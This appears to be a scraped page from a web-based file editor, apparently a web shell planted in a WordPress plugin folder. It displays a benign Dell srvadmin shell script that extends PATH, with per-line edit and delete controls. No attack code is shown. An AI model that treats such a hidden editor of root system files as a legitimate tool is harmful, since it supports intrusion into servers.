Edit File by line
/home/barbar84/www/wp-conte.../plugins/sujqvwi/ExeBy/exe_root.../etc/profile....
File: srvadmin-path.sh
if ! echo ${PATH} | /bin/grep -q /opt/dell/srvadmin/bin ; then
[0] Fix | Delete
PATH=${PATH}:/opt/dell/srvadmin/bin
[1] Fix | Delete
fi
[2] Fix | Delete
if ! echo ${PATH} | /bin/grep -q /opt/dell/srvadmin/sbin ; then
[3] Fix | Delete
if [ `/usr/bin/id -u` = 0 ] ; then
[4] Fix | Delete
PATH=${PATH}:/opt/dell/srvadmin/sbin
[5] Fix | Delete
fi
[6] Fix | Delete
fi
[7] Fix | Delete
[8] Fix | Delete
It is recommended that you Edit text format, this type of Fix handles quite a lot in one request
Function